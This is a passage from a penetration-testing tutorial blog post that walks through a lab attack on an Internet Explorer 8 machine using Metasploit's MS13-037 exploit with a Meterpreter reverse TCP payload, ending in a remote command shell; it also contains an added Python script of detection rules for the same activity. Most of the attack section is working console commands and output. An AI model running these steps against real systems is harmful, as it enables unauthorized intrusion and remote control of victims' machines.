Seeing Red: Exploitation

Exploitation: Client-side Attack

This is part of a series of posts that walk through an attack.  To start from the beginning, click here.

In the last post, we performed some basic reconnaissance on our target machine and determined its operating system, running services, and even what browser was used.  In this part, we’ll set up a client-side attack and gain access to our target machine.

In recent times, client-side attacks have become a very popular way of attacking a machine.  Client-side attacks differ from server-side attacks in that they require some kind of user interaction to successfully execute the exploit.  Phishing, where the sender poses as a legitimate entity that the receiver trusts to entice them into clicking a malicious link or opening a malicious file, is an example of a client-side attack.

We’ll explore setting up a malicious website that hosts our client-side attack.  This is easily accomplished with Kali using Metasploit.  If you recall in our scenario, the target machine, Victim, has joined our “free wireless network” that we have full control over.  This means we also have control over DNS and can redirect Victim to whichever site we please.  This is important in setting up our client-side attack.

Metasploit: MS13-037

The Metasploit Framework (MSF) is an amazing collection of exploits and payloads wrapped in an easy-to-use command-line interface.  There are a free, community-driven version and a commercial, paid version.  We’ll be using the free version in Kali to set up our client-side attack.

Since we know that Victim is running Internet Explorer 8, a very old web browser, we’ll look for a client-side attack that can take advantage of this.  After some research, we learn about MS13-037.  This was a Microsoft cumulative security patch for Internet Explorer which addressed several vulnerabilities, including CVE-2013-2551.  From the CVE database description, this is a “use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 [that] allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object.”

This sounds like something we can use.  Let’s see if Metasploit has an available exploit.  We prepare Metasploit for first use by following the instructions from the Kali website.  Open a terminal window and type msfconsole to start up the Metasploit Framework console.

root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro

Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit
       =[ metasploit v4.10.0-2014102901 [core:4.10.0.pre.2014102901 api:1.0.0]]
+ -- --=[ 1369 exploits - 833 auxiliary - 233 post        ]
+ -- --=[ 340 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > 

Now let’s search for an MS13-037 exploit by typing search ms13-037.

msf > search ms13-037

Matching Modules
================
   Name                                            Disclosure Date  Rank    Description
   ----                                            ---------------  ----    -----------
   exploit/windows/browser/ms13_037_svg_dashstyle  2013-03-06       normal  MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow
msf > 

We’re in luck: Metasploit has an available exploit.  Type use exploit/windows/browser/ms13_037_svg_dashstyle to select the exploit and then type show options to view its configurable options.

msf > use exploit/windows/browser/ms13_037_svg_dashstyle
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf exploit(ms13_037_svg_dashstyle) > 

This particular Metasploit attack creates a website that will deliver a malicious payload and give us access to our target machine.  The options shown above are specific to how we want to set up the malicious website.  We’ll leave most of these as default but change SRVPORT to 80 (this is the local port on our Attacker machine we want to listen on) and URIPATH to clickme (this is the URI path to use for serving the exploit).  To do this, we’ll type set SRVPORT 80 and set URIPATH clickme and then type show options to confirm the changes.

msf exploit(ms13_037_svg_dashstyle) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms13_037_svg_dashstyle) > set URIPATH clickme
URIPATH => clickme
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)
Exploit target:
   Id  Name
   --  ----
   0   Automatic

Next, let’s configure the exploit target.  It is currently set to Automatic; however, I’ve found that this doesn’t always work.  Let’s see what targets are available by typing show targets and then configure a specific one for Metasploit to use by typing set target followed by the number of the option we want.  We’ll again type show options to confirm our changes.

msf exploit(ms13_037_svg_dashstyle) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Automatic
   1   IE 8 on Windows 7 SP1 with JRE ROP
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) > set target 2
target => 2
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)
Exploit target:
   Id  Name
   --  ----
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) > 

We set target to 2 since target 1 is for Internet Explorer with a JRE (Java Runtime Environment), which we don’t have.  So far so good, now let’s set up the malicious payload that will be delivered to the vulnerable client.  Type show payloads to view a list of payloads that are compatible with this exploit.

msf exploit(ms13_037_svg_dashstyle) > show payloads
Compatible Payloads
===================
   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   generic/custom                                                    normal  Custom Payload
   generic/debug_trap                                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                normal  Generic x86 Tight Loop
   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                        normal  Reflective DLL Injection, Bind TCP Stager
   windows/dllinject/bind_tcp_rc4                                    normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_hop_http                                normal  Reflective DLL Injection, Reverse Hop HTTP Stager
   windows/dllinject/reverse_http                                    normal  Reflective DLL Injection, Reverse HTTP Stager
   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                 normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                     normal  Reflective DLL Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                            normal  Reflective DLL Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                 normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
   windows/dllinject/reverse_tcp_rc4                                 normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_tcp_rc4_dns                             normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/dns_txt_query_exec                                        normal  DNS TXT Record Payload Download and Execution
   windows/download_exec                                             normal  Windows Executable Download (http,https,ftp) and Execute
   windows/exec                                                      normal  Windows Execute Command
   windows/loadlibrary                                               normal  Windows LoadLibrary Path
   windows/messagebox                                                normal  Windows MessageBox
   windows/meterpreter/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
   windows/meterpreter/bind_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
   windows/meterpreter/bind_tcp_rc4                                  normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
   windows/meterpreter/reverse_hop_http                              normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP Stager
   windows/meterpreter/reverse_http                                  normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
   windows/meterpreter/reverse_https                                 normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   windows/meterpreter/reverse_https_proxy                           normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   windows/meterpreter/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_nonx_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/meterpreter/reverse_tcp_rc4                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
   windows/meterpreter/reverse_tcp_rc4_dns                           normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/metsvc_bind_tcp                                           normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                        normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind TCP Stager (IPv6)
   windows/patchupdllinject/bind_nonx_tcp                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                                 normal  Windows Inject DLL, Bind TCP Stager
   windows/patchupdllinject/bind_tcp_rc4                             normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption)
   windows/patchupdllinject/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                              normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                     normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                          normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupdllinject/reverse_tcp_rc4                          normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption)
   windows/patchupdllinject/reverse_tcp_rc4_dns                      normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/patchupmeterpreter/bind_ipv6_tcp                          normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (IPv6)
   windows/patchupmeterpreter/bind_nonx_tcp                          normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                               normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager
   windows/patchupmeterpreter/bind_tcp_rc4                           normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption)
   windows/patchupmeterpreter/reverse_ipv6_tcp                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                        normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                            normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                   normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                        normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/reverse_tcp_rc4                        normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption)
   windows/patchupmeterpreter/reverse_tcp_rc4_dns                    normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind TCP Stager (IPv6)
   windows/shell/bind_nonx_tcp                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                            normal  Windows Command Shell, Bind TCP Stager
   windows/shell/bind_tcp_rc4                                        normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption)
   windows/shell/reverse_hop_http                                    normal  Windows Command Shell, Reverse Hop HTTP Stager
   windows/shell/reverse_http                                        normal  Windows Command Shell, Reverse HTTP Stager
   windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                     normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell/reverse_tcp_rc4                                     normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption)
   windows/shell/reverse_tcp_rc4_dns                                 normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/shell_bind_tcp                                            normal  Windows Command Shell, Bind TCP Inline
   windows/shell_bind_tcp_xpfw                                       normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   windows/shell_hidden_bind_tcp                                     normal  Windows Command Shell, Hidden Bind TCP Inline
   windows/shell_reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Inline
   windows/speak_pwned                                               normal  Windows Speech API - Say "You Got Pwned!"
   windows/upexec/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
   windows/upexec/bind_nonx_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                           normal  Windows Upload/Execute, Bind TCP Stager
   windows/upexec/bind_tcp_rc4                                       normal  Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption)
   windows/upexec/reverse_hop_http                                   normal  Windows Upload/Execute, Reverse Hop HTTP Stager
   windows/upexec/reverse_http                                       normal  Windows Upload/Execute, Reverse HTTP Stager
   windows/upexec/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                        normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                    normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/upexec/reverse_tcp_rc4                                    normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption)
   windows/upexec/reverse_tcp_rc4_dns                                normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/vncinject/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
   windows/vncinject/bind_nonx_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                        normal  VNC Server (Reflective Injection), Bind TCP Stager
   windows/vncinject/bind_tcp_rc4                                    normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
   windows/vncinject/reverse_hop_http                                normal  VNC Server (Reflective Injection), Reverse Hop HTTP Stager
   windows/vncinject/reverse_http                                    normal  VNC Server (Reflective Injection), Reverse HTTP Stager
   windows/vncinject/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   windows/vncinject/reverse_tcp_rc4                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
   windows/vncinject/reverse_tcp_rc4_dns                             normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
msf exploit(ms13_037_svg_dashstyle) > 

Wow, so many options!  My personal favorite has always been the Windows Meterpreter (Reflective Injection), Reverse TCP Stager.  Meterpreter is an amazing payload that provides a whole host of options.  From the Metasploit Unleashed tutorial:

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

I like the Reverse TCP Stager because it opens a Meterpreter session on Victim that connects directly back to us.  Because Victim is making the outbound connection to our Attacker machine, and because most firewalls don’t block outbound connections by default, our newly created Meterpreter session will reach us without being blocked by Victim’s firewall.  This is as opposed to the Bind TCP Stager, which would also open a Meterpreter session on Victim but would not send it back to us.  Instead, the Meterpreter session on Victim would listen for connections from our Attacker machine, meaning we’d have to make a connection directly from Attacker to Victim’s listening Meterpreter session.  Since most firewalls deny unsolicited inbound connections by default, that connection would likely be blocked by Victim’s firewall.

All that said, let’s go ahead and use this payload by typing set payload windows/meterpreter/reverse_tcp.  Then type show options to see what payload options are configurable.

msf exploit(ms13_037_svg_dashstyle) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) > 

We’ll just configure LHOST which is the listening IP address for the payload.  Since we want the Meterpreter session to be sent back to our Attacker machine, we’ll set LHOST to 10.0.1.10 by typing set LHOST 10.0.1.10.  Again, we’ll type show options to review our changes one last time before executing the exploit.

msf exploit(ms13_037_svg_dashstyle) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     10.0.1.10        yes       The listen address
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) > 

Looks like everything’s configured just the way we wanted.  Let’s create the malicious website and serve the payload by typing exploit.

msf exploit(ms13_037_svg_dashstyle) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.1.10:4444 
[*] Using URL: http://0.0.0.0:80/clickme
[*]  Local IP: http://10.0.1.10:80/clickme
[*] Server started.
msf exploit(ms13_037_svg_dashstyle) > 

Now on our Victim machine, we’ll visit the URL created, http://10.0.1.10/clickme, and see what happens.

[Screenshot: Victim’s browser after visiting http://10.0.1.10/clickme]

From the screenshot above, we can see that Victim was redirected to another URL and the screen appears blank as if it’s trying to load something.  Eventually, Internet Explorer crashes.

[Screenshot: Internet Explorer crash dialog on Victim]

So what happened?  Did our exploit fail?  Let’s check our Metasploit console.

msf exploit(ms13_037_svg_dashstyle) > 
[*] 10.0.1.11        ms13_037_svg_dashstyle - Requesting: /clickme
[*] 10.0.1.11        ms13_037_svg_dashstyle - Sending HTML to info leak...
[*] 10.0.1.11        ms13_037_svg_dashstyle - Requesting: /clickme/XssWuvigzg?RvtqQ=1996386480
[*] 10.0.1.11        ms13_037_svg_dashstyle - Using ntdll ROP
[*] 10.0.1.11        ms13_037_svg_dashstyle - Sending HTML to trigger...
[*] Sending stage (770048 bytes) to 10.0.1.11
[*] Meterpreter session 1 opened (10.0.1.10:4444 -> 10.0.1.11:49328) at 2014-11-11 20:22:21 -0600
[*] Session ID 1 (10.0.1.10:4444 -> 10.0.1.11:49328) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3852)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1828
[+] Successfully migrated to process 

This looks promising!  The Metasploit output above is a log of what happened when Victim browsed to our malicious website.  Immediately after the Meterpreter session was created, it opened a Notepad process in the background (the user can’t see it) and then migrated itself into this Notepad process.  The reason is that once Internet Explorer crashes and is closed, a Meterpreter session running inside it dies with it.  Exploits often cause the target application to crash or close unexpectedly, and if the Meterpreter session is running as that process, it dies along with it.

A quick look at the Windows Task Manager confirms that Notepad is running in the background with the PID of 1828 as noted in the Metasploit output.  We can also see the process is running as user eric.

[Screenshot: Windows Task Manager showing notepad.exe (PID 1828) running as user eric]
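As an added example from the defender’s side (not code from the original post or from Metasploit), the following Python flags what the Metasploit log above and the earlier reverse TCP discussion describe, as it would look in endpoint telemetry on Victim: a browser calling out to a non-web port, a browser spawning notepad.exe, notepad.exe owning a socket after the migration, and a shell launched underneath that chain.  The events are constructed, Sysmon-style records built from the page’s PIDs and addresses; the event schema, explorer.exe’s PID and the benign records are assumptions.

```python
"""Detection rules over constructed, Sysmon-style endpoint events (added example,
not part of the original post).  The PIDs 3852 (iexplore.exe), 1828 (notepad.exe)
and 2936 (cmd.exe) and the 10.0.1.10:4444 callback come from the page's log;
explorer.exe's PID, the event schema and the benign records are assumed."""
from dataclasses import dataclass

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe"}
WEB_PORTS = {80, 443}
NO_NETWORK_IMAGES = {"notepad.exe", "calc.exe", "mspaint.exe"}  # never need a socket
SHELLS = {"cmd.exe", "powershell.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    image: str
    detail: str


def lineage(pid, table):
    """Ancestors of pid as [(pid, image), ...], nearest parent first."""
    chain, seen = [], set()
    while pid in table and pid not in seen:
        seen.add(pid)
        pid = table[pid]["ppid"]
        if pid not in table:
            break
        chain.append((pid, table[pid]["image"]))
    return chain


def analyze(events):
    """Replay events in order, maintain a process table and return the findings."""
    table, findings = {}, []
    for ev in events:
        if ev["type"] == "ProcessCreate":
            table[ev["pid"]] = {"image": ev["image"], "ppid": ev["ppid"]}
            parent = table.get(ev["ppid"], {}).get("image", "<unknown>")
            # Rule 1: a browser spawning anything other than another browser
            # instance (IE8 tab processes are iexplore.exe children) is unusual.
            if parent in BROWSERS and ev["image"] not in BROWSERS:
                findings.append(Finding("browser_spawned_child", ev["pid"], ev["image"],
                                        f"parent {parent} ({ev['ppid']})"))
            # Rule 2: a shell whose ancestry passes through a browser.
            if ev["image"] in SHELLS:
                chain = lineage(ev["pid"], table)
                if any(img in BROWSERS for _, img in chain):
                    path = " <- ".join(img for _, img in chain)
                    findings.append(Finding("shell_from_browser_lineage", ev["pid"],
                                            ev["image"], f"ancestry: {path}"))
        elif ev["type"] == "Connection":
            dest = f"{ev['dst']}:{ev['dport']}"
            # Rule 3: browsers talk to 80/443; an outbound 4444 is the stager callback.
            if ev["image"] in BROWSERS and ev["dport"] not in WEB_PORTS:
                findings.append(Finding("browser_to_nonweb_port", ev["pid"], ev["image"], dest))
            # Rule 4: a process that never needs the network owns a socket.
            if ev["image"] in NO_NETWORK_IMAGES:
                findings.append(Finding("unexpected_network_process", ev["pid"], ev["image"], dest))
    return findings


# Constructed sample.  "Connection" records stand for either a Sysmon network
# event or a netstat-style snapshot of established sockets per process; the
# notepad.exe record is how the session looks after 'migrate' hands it the socket.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "pid": 1200, "ppid": 900, "image": "explorer.exe"},
    {"type": "ProcessCreate", "pid": 3852, "ppid": 1200, "image": "iexplore.exe"},
    {"type": "ProcessCreate", "pid": 3900, "ppid": 3852, "image": "iexplore.exe"},  # tab
    {"type": "Connection", "pid": 3852, "image": "iexplore.exe", "dst": "10.0.1.10", "dport": 80},
    {"type": "Connection", "pid": 3852, "image": "iexplore.exe", "dst": "10.0.1.10", "dport": 4444},
    {"type": "ProcessCreate", "pid": 1828, "ppid": 3852, "image": "notepad.exe"},
    {"type": "Connection", "pid": 1828, "image": "notepad.exe", "dst": "10.0.1.10", "dport": 4444},
    {"type": "ProcessCreate", "pid": 2936, "ppid": 1828, "image": "cmd.exe"},
    {"type": "ProcessCreate", "pid": 4000, "ppid": 1200, "image": "cmd.exe"},  # user's own prompt
]


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.image}: {f.detail}")
```

The benign records (the tab process, the port-80 request and the user’s own cmd.exe under explorer.exe) produce no findings, which is the allowlisting an analyst needs so that the rules do not fire on every IE8 tab or command prompt.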

Back in Metasploit, let’s view our open Meterpreter sessions by typing sessions.

msf exploit(ms13_037_svg_dashstyle) > sessions
Active sessions
===============
  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter x86/win32  WIN-FDN9DNVQ5IR\eric @ WIN-FDN9DNVQ5IR  10.0.1.10:4444 -> 10.0.1.11:49328 (10.0.1.11)

Now let’s interact with the session by typing sessions -i 1.

msf exploit(ms13_037_svg_dashstyle) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > 

As proof that we are in fact remotely connected to Victim, we can type shell to open a Windows command prompt (cmd.exe) and then type ipconfig to verify the IP address of Victim. We can see the IP address is 10.0.1.11. We can also type hostname to confirm that this is the same hostname we saw in our reconnaissance phase.

meterpreter > shell
Process 2936 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Users\eric\Desktop>ipconfig
ipconfig
Windows IP Configuration

